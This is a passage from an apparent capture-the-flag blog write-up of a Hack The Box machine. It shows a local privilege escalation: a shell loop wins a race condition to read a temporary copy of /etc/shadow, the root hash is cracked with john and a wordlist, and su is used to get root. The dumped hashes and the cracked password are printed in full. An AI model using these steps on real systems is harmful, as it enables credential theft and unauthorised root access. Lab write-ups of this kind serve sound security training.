        <span class="n">sys</span><span class="o">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
    <span class="n">salt</span> <span class="o">=</span> <span class="s">'$6$'</span><span class="o">+</span><span class="n">salt</span><span class="o">+</span><span class="s">'$'</span>
    <span class="n">realPass</span> <span class="o">=</span> <span class="n">salt</span> <span class="o">+</span> <span class="n">realPass</span>

    <span class="nb">hash</span> <span class="o">=</span> <span class="n">crypt</span><span class="o">.</span><span class="n">crypt</span><span class="p">(</span><span class="n">passW</span><span class="p">,</span> <span class="n">salt</span><span class="p">)</span>

    <span class="k">if</span> <span class="nb">hash</span> <span class="o">==</span> <span class="n">realPass</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"Authed!"</span><span class="p">)</span>
        <span class="n">session</span><span class="p">[</span><span class="s">'authenticated'</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"Incorrect pass"</span><span class="p">)</span>
        <span class="n">os</span><span class="o">.</span><span class="n">remove</span><span class="p">(</span><span class="s">'/tmp/SSH/'</span><span class="o">+</span><span class="n">path</span><span class="p">)</span>
        <span class="n">sys</span><span class="o">.</span><span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
    <span class="n">os</span><span class="o">.</span><span class="n">remove</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="s">'/tmp/SSH/'</span><span class="p">,</span><span class="n">path</span><span class="p">))</span>
<span class="p">[</span><span class="o">...</span><span class="p">]</span>
</code></pre></div></div>
<p>The script reads the shadow file, copies it to /tmp/SSH, checks the user submitted password and deletes the copy again.
The 0.1 second sleep gives enough time for a race-condition to read the shadow file.</p>

<h4 id="race-condition-to-root">Race-condition to root</h4>
<p>Let us exploit the race-condition by endlessly trying to read the copy of the shadow file.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">robert@obscure:/tmp$</span><span class="w"> </span><span class="k">while </span><span class="nb">true</span><span class="p">;</span> <span class="k">do </span><span class="nb">timeout </span>1 <span class="nb">cat </span>SSH/<span class="k">*</span> 2&gt;/dev/null<span class="p">;</span> <span class="k">done</span>
</code></pre></div></div>

<p>Let us run the SSH server in another terminal now.</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">robert@obscure:~/BetterSSH$</span><span class="w"> </span><span class="nb">sudo</span> /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py
<span class="go">Enter username: a
Enter password: a
Invalid user
</span></code></pre></div></div>

<p>Checking back to the race-condition exploit we get the hashes:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">robert@obscure:/tmp$</span><span class="w"> </span><span class="k">while </span><span class="nb">true</span><span class="p">;</span> <span class="k">do </span><span class="nb">timeout </span>1 <span class="nb">cat </span>SSH/<span class="k">*</span> 2&gt;/dev/null<span class="p">;</span> <span class="k">done</span>
<span class="go">root
</span><span class="gp">$</span>6<span class="nv">$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1</span>
<span class="go">18226
0
99999
7


robert
</span><span class="gp">$</span>6<span class="nv">$fZZcDG7g$lfO35GcjUmNs3PSjroqNGZjH35gN4KjhHbQxvWO0XU</span>.TCIHgavst7Lj8wLF/xQ21jYW5nD66aJsvQSP/y1zbH/
<span class="go">18163
0
99999
7
</span></code></pre></div></div>
<p>Let us copy the hash into a file and crack it using john.</p>

<h4 id="cracking-the-root-password">Cracking the root password</h4>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">root@silence:~#</span><span class="w"> </span><span class="nb">cat </span>hash.txt
<span class="gp">root:$</span>6<span class="nv">$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1</span>
<span class="go">
</span><span class="gp">root@silence:~#</span><span class="w"> </span>john hash.txt <span class="nt">-w</span><span class="o">=</span>/usr/share/wordlists/rockyou.txt
<span class="go">Using default input encoding: UTF-8
</span><span class="gp">Loaded 1 password hash (sha512crypt, crypt(3) $</span>6<span class="nv">$ </span><span class="o">[</span>SHA512 256/256 AVX2 4x]<span class="o">)</span>
<span class="go">Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mercedes         (root)
</span></code></pre></div></div>
<p>Now that we have the root password, let us su to root and read root.txt</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">robert@obscure:~$</span><span class="w"> </span>su
<span class="go">Password: mercedes
</span><span class="gp">root@obscure:~#</span><span class="w"> </span><span class="nb">cat </span>root.txt
<span class="go">512fd***************************
</span></code></pre></div></div>

  </div><a class="u-url" href="/2020/05/09/htb-Obscurity.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">Chr0x6eOs</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">Chr0x6eOs</li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/chr0x6eos"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">chr0x6eos</span></a></li><li><a href="https://www.twitter.com/Chr0x6eOs"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">Chr0x6eOs</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>Blog for HTB writeups and other security related stuff</p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
